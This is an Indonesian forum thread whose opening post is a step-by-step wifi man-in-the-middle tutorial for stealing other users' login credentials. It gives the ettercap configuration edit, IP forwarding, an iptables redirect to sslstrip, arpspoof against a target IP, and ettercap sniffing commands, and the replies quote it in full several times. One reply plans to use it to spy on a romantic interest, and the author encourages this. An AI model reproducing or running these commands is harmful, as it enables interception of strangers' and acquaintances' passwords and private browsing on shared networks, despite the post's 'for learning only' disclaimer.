Melihat Username dan Password Pengguna Jaringan Wifi

by Nue Bhandell - 04-29-2016 at 04:13 AM
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 04-29-2016, 04:13 AM (This post was last modified: 05-02-2016, 01:18 PM by Nue Bhandell.)
awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13105789_783858338415188_779337003_o.png...e=5729604B]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13106738_783858388415183_732244936_o.png...e=57298D69]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13113135_783858408415181_2082658609_o.pn...e=57297DD7]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13120598_783858421748513_1984075421_o.pn...e=57296374]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13120790_783858541748501_1281277873_o.pn...e=5729B50A]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR
Reply
Find Posts
Administrator
Administrators
Posts:
91
Joined:
Mar 2016
Likes:
2
Reputation:
0
2 Year Of Member
#2
Posted: 04-29-2016, 04:35 AM
(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

Nice one (y)
Reply
Find Posts
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
OP
Posted: 04-29-2016, 06:53 AM
(04-29-2016, 04:35 AM)koboi Wrote:
(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

Nice one (y)

tengkyuuhh om hehehe
Reply
Find Posts
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 04-29-2016, 08:15 AM
test on kang, lmayan buat kepo si doi hihihi
Reply
Find Posts
Junior Member
Posts:
14
Joined:
Mar 2016
Likes:
0
Reputation:
1
2 Year Of Member
#5
Posted: 05-02-2016, 03:21 AM
(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

nice kang
Reply
Find Posts
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#6
OP
Posted: 05-02-2016, 01:20 PM (This post was last modified: 05-02-2016, 01:21 PM by Nue Bhandell.)
(04-29-2016, 08:15 AM)teh Wrote: test on kang, lmayan buat kepo si doi hihihi

hehehe, silahkan, selebihnya jadi tanggung jawab masing2 yoo akwkaw

(05-02-2016, 03:21 AM)owl Wrote:
(04-29-2016, 04:13 AM)Nue Bhandell Wrote: awkkaw post dulu sebelum shalat jumat  :heart:
awkkaw , binggung mau buat judulnya jadii apaan, ya gitu aja deh jadinya, dan btw kira2 salah room gak nih thread ? lanjut deh

kali ini sedikit nyicip teknik MiTM ,, Apa itu ??
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi *kira2begitu


Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad

leafpad /etc/ettercap/etter.conf

selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan redir_command_off (cek SS dibawah)

[Image: 13120586_783857848415237_969346868_o.png...e=5725BEA7]

selanjutnya kita aktifkan IP Forward dengan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,

untuk mengetahui ip gateway cukup ketikkan di terminal

route -n

[Image: 13091868_783857881748567_485575617_o.png...e=57250997]

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

[Image: 13090708_783857885081900_895853354_o.png...e=572507D9]

Selanjutnya lakukan spoof arp menggunakan arpspoof

arpspoof -i wlan0 -t 192.168.1.102 192.168.1.254


keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.102 : Ip target
192.168.1.254 : ip gateway

[Image: 13090768_783857921748563_753369840_o.png...e=5725BA25]

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya

sslstrip -akf 

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap

ettercap -T -q -i wlan0 -M arp // //

[Image: 13091574_783858021748553_122467338_o.png...e=5724B2AB]

Jadi nanti jika target mengakses situs-situs yang memerlukan login, akan muncul detail user dan password serta link situs yang dia buka, di bawah Hit. 
Seperti ini

xixixhi ,, maaf ya gan kalo tutor basi  :D dan kalo ada kesalahan mohon dibenarkan di kolom komentar beb :heart:
Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak  ;)

Kunjungin juga gengs TKJ Cyber Art


SUMUR

nice kang

tengkyuh om
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
2 Guest(s)